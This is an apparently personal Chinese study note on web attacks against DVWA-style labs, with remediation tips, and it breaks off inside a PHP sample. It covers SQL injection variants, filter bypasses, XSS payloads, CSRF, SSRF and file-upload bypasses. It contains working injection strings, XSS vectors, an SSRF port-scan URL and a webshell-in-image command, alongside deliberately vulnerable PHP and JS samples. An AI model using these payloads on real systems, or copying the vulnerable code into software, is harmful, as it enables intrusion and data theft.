<h5 id="union注入攻击"><a href="#union注入攻击" class="headerlink" title="union注入攻击"></a>union注入攻击</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">#手动注入</span><br><span class="line">1‘ and ’1‘=’1</span><br><span class="line">union select ... #联合查询，连接两个表的结果（必须查一样的字段名），忽略重复</span><br><span class="line">union all select ... #同上，不忽略重复</span><br><span class="line">... limit 0,10 #取前10条</span><br><span class="line"></span><br><span class="line"># 几个函数</span><br><span class="line">datebase() version() user() #当前使用的数据库、版本、用户</span><br><span class="line"></span><br><span class="line"># 注释符号</span><br><span class="line">#或者--空格或者/**/</span><br><span class="line"></span><br><span class="line"># 判断字段数</span><br><span class="line">order by 1-99 # 递增，开始报错则意味着超出字段数</span><br><span class="line">1&apos; and 1=1 union select 1,2,3 #union select必须要和前面是相同的列数，且除了输出前面的1的列外，还会输出后面的构造。若要只输出后面的构造，改成and 1=2</span><br><span class="line">1&apos; union select 1,2,database() limit 1,1</span><br><span class="line"></span><br><span class="line">#判断数据库版本、数据库用户权限</span><br><span class="line">and ord(mid(version(),1,1))&gt;51 #ord()获取二进制码，mid()截位，version()获取数据库版本。若显示出查询结果，则表明版本大于5.1，不显示则相反</span><br><span class="line"></span><br><span class="line">#获取数据库名</span><br><span class="line">1’ union select 1,database() limit 1,1 #法一</span><br><span class="line">1&apos; union select null,schema_name,null from information_schema.schemata #法二</span><br><span class="line"></span><br><span class="line">#获取数据表名</span><br><span class="line">1&apos; and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=&apos;dvwa&apos; #dvwa是从上面查库名得到的,group_concat()是一次返回所有字段</span><br><span class="line">1&apos; union select 1,table_name from information_schema.tables where table_schema=&apos;dvwa&apos; #法二</span><br><span class="line"></span><br><span class="line">#获取字段名</span><br><span class="line">1&apos; and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=&apos;dvwa&apos; and table_name=&apos;users&apos; #users是上面得到的表名</span><br><span class="line">1&apos; and 1=2 union select 1,column_name from information_schema.columns where table_schema=&apos;dvwa&apos; and table_name=&apos;users&apos; #法二</span><br><span class="line"></span><br><span class="line">#查询表中数据</span><br><span class="line">2’ and 1=2 union select 1,group_concat(user,password,last_name) from dvwa.users #</span><br><span class="line">-1&apos; union select user,password from dvwa.users #dvwa.users是前面查出来的数据库.表名</span><br></pre></td></tr></table></figure>
<h5 id="Boolean注入攻击"><a href="#Boolean注入攻击" class="headerlink" title="Boolean注入攻击"></a>Boolean注入攻击</h5><p>指只返回yes和no的页面，不返回数据    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and length(database())&gt;=3 #判断数据库名长度</span><br><span class="line">1&apos; and substr(database(),1,1)=&apos;t&apos; #逐字符判断数据库名,可用burp爆破功能</span><br><span class="line">1‘ and substr((select table_name from information_schema.tables where table_schema=&apos;dvwa&apos; limit 0,1),1,1)=&apos;u&apos; -- #逐字符判断表名</span><br><span class="line"></span><br><span class="line">#判断注入点</span><br><span class="line">1’ or 1=1#、</span><br><span class="line">1&apos; and 1=2#</span><br></pre></td></tr></table></figure>
<h5 id="报错注入攻击"><a href="#报错注入攻击" class="headerlink" title="报错注入攻击"></a>报错注入攻击</h5><p>程序直接把错误信息输出到页面上，利用报错注入获取数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&apos; and updatexml(1,concat(&apos;~&apos;,(select user()),&apos;~&apos;),1) -- #利用更新xml文档的的报错注入（多了个单引号）</span><br><span class="line">&apos; and updatexml(1,concat(&apos;~&apos;,(select schema_name from information_schema.schemata limit 0,1),&apos;~&apos;),1) -- #获取数据库名</span><br></pre></td></tr></table></figure>
<h4 id="SQL注入进阶"><a href="#SQL注入进阶" class="headerlink" title="SQL注入进阶"></a>SQL注入进阶</h4><h5 id="时间注入"><a href="#时间注入" class="headerlink" title="时间注入"></a>时间注入</h5><p>类似boolean也是报错返回no，时注是利用sleep()或benchmark()等函数让mysql执行时间变长</p>
<p>使用if(expr1,expr2,expr3)语句，若expr1为真，返回expr2，否则expr3。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&apos; and if(length(database())&lt;5,sleep(5),1) -- #判断数据库名是否超过5字节</span><br><span class="line">1&apos; and if(substr(database(),1,1)=&apos;m&apos;,sleep(5),1) -- #逐个字符判断数据库名</span><br></pre></td></tr></table></figure>
<h5 id="堆叠查询注入"><a href="#堆叠查询注入" class="headerlink" title="堆叠查询注入"></a>堆叠查询注入</h5><p>使用PDO执行sql语句，允许执行多条语句，但是只返回第一条结果，所以再用时间注入方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;;select if(substr(user(),1,1)=&apos;r&apos;,sleep(5),1) -- #其实还是时间注入，只是用;分割两条查询语句</span><br></pre></td></tr></table></figure>
<h5 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h5><p>一个注册页面，一个查询界面，指数据在插入时进行了转义（比如addslashes()将单引号转义为\‘），但取出数据时候并没有检查，多了一个单引号导致出现’test’’单引号无法闭合的情况，页面会报错。</p>
<h5 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h5><p>传入的数据为<code>id=1&#39;</code>时候，但是传入的单引号又被转义（addslashes()、iconv()）了，导致参数无法逃出单引号的包围。</p>
<p>但是，若数据库编码方式为GBK时候，（反斜杠的编码为%5c），此时构造数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1%df&apos;-- #此时%df和反斜杠构成%df%5c，是繁体字“連”，成功逃逸，可以爆出数据库错误</span><br></pre></td></tr></table></figure>
<p>这时候就可以用之前的注入方式，但是特别需要注意，要再次使用到单引号时候，单引号被反斜杠转义，需要使用嵌套查询：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1%df&apos; union select null,table_name from information_schema.tables where table_schema=&apos;dvwa&apos; -- #这里&apos;就被转义了</span><br><span class="line">1%df&apos; union select null,table_name from information_schema.tables where table_schema=(select database()) limit 0,1 -- #避免使用了单引号，查到了table_name</span><br><span class="line">1%df&apos; union select null,column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1) limit 0,1 -- #三层嵌套，查字段名，limit控制查第几个表</span><br></pre></td></tr></table></figure>
<h5 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h5><p>URL中没有GET参数，抓包发现cookie中有参数，结合前面的手法，这时候一般普通注入就行了，数据库名、表名、列名</p>
<h5 id="Base64注入"><a href="#Base64注入" class="headerlink" title="Base64注入"></a>Base64注入</h5><p>根据URL，ID参数先被Base64编码，并且解码后没有过滤单引号，典型的例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id=1经过base64编码会变为id=MQ%3d（%3d为=）</span><br><span class="line">尝试把1&apos;一起base64编码，变成id=MSc%3d</span><br><span class="line">尝试把1&apos; and 1=1#一起base64编码，变成MSUyNyUyMGFuZCUyMDElM0QxJTIzJTBB</span><br></pre></td></tr></table></figure>
<h5 id="XFF注入"><a href="#XFF注入" class="headerlink" title="XFF注入"></a>XFF注入</h5><p>因为有些php代码或许会获取环境变量，比如客户端IP地址，然后去做mysql查询（??有何意义）</p>
<p>所以可以伪造HTTP请求头X-Forward-for头，其代表客户端真实IP，改为127.0.0.1，正常访问</p>
<p>改为127.0.0.1’报错，则说明存在xff注入点，同之前的注入方式</p>
<h4 id="SQL注入绕过方式"><a href="#SQL注入绕过方式" class="headerlink" title="SQL注入绕过方式"></a>SQL注入绕过方式</h4><h5 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and ---&gt; And</span><br><span class="line">union ---&gt; Union</span><br></pre></td></tr></table></figure>
<h5 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1 and 1=1 ---&gt; 1 aandnd 1=1 #过滤关键字and</span><br><span class="line">1 order by 1,2,3 ---&gt; 1 oorrder by 1,2,3 #过滤关键字or</span><br></pre></td></tr></table></figure>
<h5 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h5><p>注意URL的关键词是否改变</p>
<p>除了服务器对关键词自动编码一次外，代码内再编码一次，所以要进行两次编码（注意是两次URL全编码）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 and 1=1 ---&gt; id=1 %25%36%31%25%36%65%25%36%34 1=1 #貌似没找到全编码的网站</span><br></pre></td></tr></table></figure>
<h5 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 /* and */1=1 #即把关键字注释掉</span><br></pre></td></tr></table></figure>
<h4 id="代码防范SQL注入"><a href="#代码防范SQL注入" class="headerlink" title="代码防范SQL注入"></a>代码防范SQL注入</h4><h5 id="过滤危险字符"><a href="#过滤危险字符" class="headerlink" title="过滤危险字符"></a>过滤危险字符</h5><p>正则匹配，遇到特殊字符就shut down</p>
<h5 id="使用预编译语"><a href="#使用预编译语" class="headerlink" title="使用预编译语"></a>使用预编译语</h5><p>不把变量直接拼接到PDO语句中，而是使用占位符进行数据库的增删改查（就是把用户提交的and or union操作符当做普通的字符串，防止sql注入）</p>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><h4 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h4><p>跨站脚本攻击，主要包括：</p>
<ol>
<li><p>反射型XSS</p>
<p>非持久性（一次性）</p>
<p>攻击者把包含XSS代码的恶意链接发给目标用户，用户点开，服务器接收用户请求别进行处理，然后服务器把带有XSS代码的数据发回给用户的浏览器，浏览器解析并触发XSS漏洞</p>
</li>
<li><p>存储型XSS</p>
<p>持久性，攻击脚本永久地存在目标服务器上（污染），多见于论坛、博客、留言板，用户访问时候触发恶意脚本，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt; alert(/xss/) &lt;/script&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>DOM型XSS</p>
<p>非持久性（一次性），基于DOM文档对象模型，客户端渲染页面时候会根据DOM动态修改页面内容（本地浏览器处理数据时候执行，不需要和服务器交互）</p>
<p>攻击者把包含XSS代码的链接发给用户，诱骗其打开，用户的浏览器处理响应时，DOM对象就会处理XSS代码</p>
</li>
</ol>
<h4 id="XSS基础"><a href="#XSS基础" class="headerlink" title="XSS基础"></a>XSS基础</h4><h5 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h5><p>这是由于服务器代码未对输入内容进行检查，导致可以在点开恶意链接的用户的浏览器上执行script脚本或者图片超链接。例如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">构造url为http://192.168.0.1/xss/xss.php?xss_input_value=“&gt;&lt;img src=1 onerror=alert(/xss/) /&gt;</span><br><span class="line">拼接上html代码变为</span><br><span class="line">&lt;input type=&quot;text&quot; value=&quot;&quot;&gt;&lt;img src=1 onerror=alert(/xss/) /&gt; &quot;&gt;</span><br></pre></td></tr></table></figure>
<p>构造出的url闭合了value的值和input标签，并嵌入script脚本，导致弹窗。</p>
<h5 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h5><p>通过留言或者帖子，写入服务器数据库里的攻击</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br><span class="line">&lt;img src=1 onerror=alert(/xss/) /&gt;</span><br></pre></td></tr></table></figure>
<h5 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h5><p>一般用于替换操作时，此时不需要和服务期进行交互，而是通过DOM操作将目标元素改为要修改的值（这是合法的），只需要html代码，不需要服务器端代码</p>
<p>但是如果没对要替换的内容进行检查时候，某些恶意链接是可以在DOM文档的某些位置插入XSS脚本的</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#例如</span><br><span class="line"><span class="tag">&lt;<span class="name">h6</span> <span class="attr">id</span>=<span class="string">"id1"</span>&gt;</span>显示替换的内容<span class="tag">&lt;/<span class="name">h6</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">""</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">id</span>=<span class="string">"dom_input"</span> <span class="attr">value</span>=<span class="string">"输入"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"button"</span> <span class="attr">value</span>=<span class="string">"替换"</span> <span class="attr">onclick</span>=<span class="string">"tihuan()"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"></span><br><span class="line">#构造恶意输入</span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">1</span> <span class="attr">onerror</span>=<span class="string">alert(/xss/)</span> /&gt;</span></span><br></pre></td></tr></table></figure>
<p>用户点击button，执行tihuan()函数，而这个函数是个DOM操作，通过document.getElementById获取id1的节点，然后把id1的内容修改为id为dom_input中的值，即用户输入的值，然后就执行了xss脚本。值得一提是，由于是隐式输出，不会在源代码里看到xss代码。</p>
<h4 id="XSS进阶"><a href="#XSS进阶" class="headerlink" title="XSS进阶"></a>XSS进阶</h4><h5 id="常用测试语句及编码绕过"><a href="#常用测试语句及编码绕过" class="headerlink" title="常用测试语句及编码绕过"></a>常用测试语句及编码绕过</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/) &lt;/script&gt;</span><br><span class="line">&lt;img src=1 onerror=alert(/xss) /&gt;</span><br><span class="line">&lt;svg onload=alert(1) /&gt;</span><br><span class="line">&lt;a href=javascript: alert(1) /&gt;</span><br></pre></td></tr></table></figure>
<p>绕过方式：</p>
<ol>
<li><p>JS编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#八进制</span><br><span class="line">e ---&gt; \145</span><br><span class="line"></span><br><span class="line">#两个十六进制</span><br><span class="line">e ---&gt; \x65</span><br><span class="line"></span><br><span class="line">#四个十六进制</span><br><span class="line">e ---&gt; \u0065</span><br><span class="line"></span><br><span class="line">#控制字符</span><br><span class="line">\r</span><br></pre></td></tr></table></figure>
</li>
<li><p>HTML实体编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#命名实体：以&amp;开头，以分号结尾，例如</span><br><span class="line">&lt; ---&gt; &amp;lt;</span><br><span class="line"></span><br><span class="line">#字符编码：十进制、十六进制ASCII码或Unicode字符编码</span><br><span class="line">&lt; ---&gt; &amp;#60; 或 &amp;#x3c</span><br></pre></td></tr></table></figure>
</li>
<li><p>URL编码</p>
<p>即两次URL全编码</p>
<p>   若alert被过滤成%25%36%31…..%34，则说明被编码了</p>
</li>
</ol>
<h5 id="XSS漏洞修复"><a href="#XSS漏洞修复" class="headerlink" title="XSS漏洞修复"></a>XSS漏洞修复</h5><ol>
<li><p>过滤输入的字符，例如</p>
<p>‘ “ &lt; &gt; on*</p>
</li>
<li><p>对输出到页面的数据进行相应的编码</p>
</li>
</ol>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><h4 id="简介-1"><a href="#简介-1" class="headerlink" title="简介"></a>简介</h4><p>跨站请求伪造，听起来有点点像xss，但不同。</p>
<p>攻击者通过伪装成受信任用户请求受信任的网站，进行非法的操作，比如转账、发邮件、消息。</p>
<p>例如下面这个链接：</p>
<p><a href="http://192.168.234.178/dvwa/vulnerabilities/csrf/?password_new=1&amp;password_conf=1&amp;Change=Change#" target="_blank" rel="noopener">http://192.168.234.178/dvwa/vulnerabilities/csrf/?password_new=1&amp;password_conf=1&amp;Change=Change#</a> #就是一个典型的csrf链接，无认证无未知信息</p>
<p>需要有几个条件：</p>
<ul>
<li>目标用户已经登录了网站，能执行网站功能（这个有点类似一些网站会给你跳到支付宝页面去，就可能是攻击者盲猜你正登录着支付宝，所以能执行csrf恶链）</li>
<li>目标用户访问攻击者制造的URL</li>
<li>目标网站上的关键操作不存在攻击者未知的原始数据</li>
</ul>
<p>btw，burp可以自动生成CSRF的poc</p>
<h4 id="CSRF漏洞代码"><a href="#CSRF漏洞代码" class="headerlink" title="CSRF漏洞代码"></a>CSRF漏洞代码</h4><ul>
<li>通过GET参数username和参数password，select查询是否存在对应的用户，若用户存在，则通过$_SESSION设置一个session:isadmin=admin，否则为isadmin=guest</li>
<li>然后判断session中的isadmin是否为admin，若不是则跳转到登录界面，所以只有管理员才有添加用户功能</li>
<li>获取POST参数username和参数password，插入users表中，完成添加用户</li>
</ul>
<p>然后若是真的管理员访问了攻击者的csrf恶链（生成poc页面后你还得发布到某个网站上，诱骗目标用户去点击那个恶链），就会添加一个攻击者想要的用户</p>
<h4 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h4><ul>
<li>验证Referer的值，一般Referer是以自己网站开头的域名则是合法的。若抓包后删掉Referer的值还能访问，则肯定存在csrf漏洞</li>
<li>http请求中以参数形式加入一个攻击者不能伪造的信息token，并在服务器上验证这个token</li>
</ul>
<h3 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h3><h4 id="简介-2"><a href="#简介-2" class="headerlink" title="简介"></a>简介</h4><p>服务器端请求伪造，攻击者构造请求，由服务器端发起请求，目标是内网系统。</p>
<p>比如操作目标服务器，让它从指定URL地址获取文本、图片内容（参考伊朗黑客把特朗普的图片发到美国政府某网站）</p>
<h4 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h4><ul>
<li>对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息</li>
<li>攻击运行在内网或本地的应用程序（how）</li>
<li>对内网Web应用进行指纹识别，识别企业内部的资产信息</li>
<li>攻击内外网的Web应用</li>
<li>利用file协议读取本地文件</li>
</ul>
<p>比如下面这个链接</p>
<p>127.0.0.1/ssrf.php?url=192.168.0.2:3306 #后面的地址是内网地址，这样就能根据页面返回的信息判断出该内网地址是否开启3306端口</p>
<h4 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function curl($url)&#123;</span><br><span class="line">	$ch = curl_init();</span><br><span class="line">	curl_setopt($ch,CURLOPT_URL,$url);</span><br><span class="line">	curl_setopt($ch,CURLOPT_HEADER,0);</span><br><span class="line">	curl_exec($ch); #由于服务器端会把banner信息返回客户端，所以可以据此判断服务器有哪些服务</span><br><span class="line">	curl_close($ch);</span><br><span class="line">&#125;</span><br><span class="line">$url = $_GET[&apos;utl&apos;];</span><br><span class="line">curl($url);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="修复建议-1"><a href="#修复建议-1" class="headerlink" title="修复建议"></a>修复建议</h4><ul>
<li>限制请求的端口只能为Web端口，只允许访问HTTP、HTTPS请求</li>
<li>限制不能访问内网IP</li>
<li>屏蔽返回的详细信息</li>
</ul>
<h3 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h3><h4 id="简介-3"><a href="#简介-3" class="headerlink" title="简介"></a>简介</h4><p>若服务器端代码未对客户端上传文件进行严格的验证和过滤，则容易造成可以上传任意文件的情况，主要就是一些脚本、一句话木马，危害就是，你马（shell）没了</p>
<h4 id="JS检测绕过攻击"><a href="#JS检测绕过攻击" class="headerlink" title="JS检测绕过攻击"></a>JS检测绕过攻击</h4><p>指只在客户端浏览器使用JS对数据包进行检测，一种前端检测。</p>
<p>两种方法绕过：</p>
<ul>
<li>使用浏览器插件，删除文件后缀的JS代码</li>
<li>先把需要上传的文件后缀改成允许上传的，再抓包改回来</li>
</ul>
<h5 id="代码分析-1"><a href="#代码分析-1" class="headerlink" title="代码分析"></a>代码分析</h5><p>标志性存在js检测绕过攻击的代码部分，用了JS的selectFile函数，这个函数先把文件名转小写再substr获取最后的点号后的后缀，若不是.jpg就报错。例如</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=<span class="string">"text/javascript"</span>&gt;</span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">selectFile</span>(<span class="params">fnUpload</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">var</span> filename = fnuUpload.value;</span><br><span class="line">    	<span class="keyword">var</span> mime = filename.toLowerCase().substr(filename.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line">    	<span class="keyword">if</span>(mime != <span class="string">".jpg"</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            alert(<span class="string">"请选择以jpg格式的照片上传"</span>);</span><br><span class="line">            fnUpload.outerHTML=fnUpload.outerHTML;</span><br><span class="line">        &#125;</span><br><span class="line">	&#125;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="文件后缀绕过攻击"><a href="#文件后缀绕过攻击" class="headerlink" title="文件后缀绕过攻击"></a>文件后缀绕过攻击</h4><p>服务期代码限制某些后缀文件不允许上传，但是某些apache允许解析其他文件后缀，从httpd.conf中，看配置中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php.php.phtml #表明允许上传并解析phtml文件</span><br></pre></td></tr></table></figure>
<p>而且，apache是从右往左进行判断解析后缀的，若最右侧不可识别，就往左一个，所以可以上传1.php.xxxx\</p>
<h5 id="代码分析-2"><a href="#代码分析-2" class="headerlink" title="代码分析"></a>代码分析</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$info=pathinfo($_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">$ext=$info[&apos;extension&apos;];</span><br><span class="line">if(strtolower($ext) == &quot;php&quot;)&#123;</span><br><span class="line">	exit(&quot;不允许的文件后缀名&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="文件类型绕过攻击"><a href="#文件类型绕过攻击" class="headerlink" title="文件类型绕过攻击"></a>文件类型绕过攻击</h4><p>若服务器端代码通过判断Content-Type值来判断文件类型的，那么可以通过修改抓包的Content-Type值绕过，例如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Content-Type: application/octet-stream #上传1.php</span><br><span class="line">Content-Type: image/jpeg #上传1.jpg</span><br></pre></td></tr></table></figure>
<h5 id="代码分析-3"><a href="#代码分析-3" class="headerlink" title="代码分析"></a>代码分析</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#通过$_FILES[&quot;file&quot;][&quot;type&quot;]判断文件类型，这时候可以通过抓包修改Content-Type来绕过</span><br><span class="line">if( ($_FILES[&quot;file&quot;][&quot;type&quot;] != &quot;image/gif&quot;) &amp;&amp; ($_FILES[&quot;file&quot;][&quot;type&quot;] != &quot;image/jpeg&quot;) &amp;&amp; ($_FILES[&quot;file&quot;][&quot;type&quot;] != &quot;image/pjpeg&quot;))&#123;</span><br><span class="line">	exit($_FILES[&quot;file&quot;][&quot;type&quot;]);</span><br><span class="line">	exit(&quot;格式不允许&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">#通过getimagesize()是否能获取到图片的长宽高来判断文件类型，这时候可以通过将图、shell压成一个图片方式上传</span><br><span class="line">#cat  image.png webshell.php &gt; image.php</span><br><span class="line">if (!getimagesize($_FILES[&quot;file&quot;][&quot;tmp_name&quot;]))&#123;</span><br><span class="line">	exit(&quot;不允许的格式&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="文件截断绕过攻击"><a href="#文件截断绕过攻击" class="headerlink" title="文件截断绕过攻击"></a>文件截断绕过攻击</h4><p>利用php版本低于5.3.4，PHP的magic_quotes_gpc为OFF状态</p>
<p>若服务器代码通过对文件名截断，加上一串字符并统一加上后缀方式，来控制文件上传类型，这时候可以用%00截断文件名方式成功上传php文件。例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#初始url</span><br><span class="line">127.0.0.1/a.php?jieduan=111</span><br><span class="line"></span><br><span class="line">#修改url为（抓包修改）</span><br><span class="line">jieduan=1.php%00</span><br><span class="line"></span><br><span class="line">#这时候服务端获取到的文件名为</span><br><span class="line">1.php%00602020132411234132.jpg</span><br><span class="line">#等同于</span><br><span class="line">1.php</span><br></pre></td></tr></table></figure>
<h5 id="代码分析-4"><a href="#代码分析-4" class="headerlink" title="代码分析"></a>代码分析</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$file_arr = <span class="keyword">array</span>(<span class="string">'flv'</span>,<span class="string">'mp3'</span>,<span class="string">'3gp'</span>,<span class="string">'zip'</span>,<span class="string">'rar'</span>,<span class="string">'gif'</span>,<span class="string">'jpg'</span>,<span class="string">'png'</span>);</span><br><span class="line">	$file_ext = substr($_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>], strrpos($_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>],<span class="string">"."</span>)+<span class="number">1</span>); <span 